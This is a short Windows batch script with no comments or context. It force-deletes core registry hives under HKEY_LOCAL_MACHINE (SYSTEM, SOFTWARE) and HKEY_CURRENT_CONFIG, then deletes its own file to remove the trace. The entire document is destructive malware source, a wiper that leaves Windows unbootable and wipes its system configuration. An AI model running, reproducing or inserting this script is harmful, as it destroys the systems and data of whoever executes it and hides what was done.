@ECHO OFF
REG DELETE HKEY_CURRENT_CONFIG\System /f
REG DELETE HKEY_CURRENT_CONFIG\Software /f
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /f
(goto) 2>nul & del "%~f0"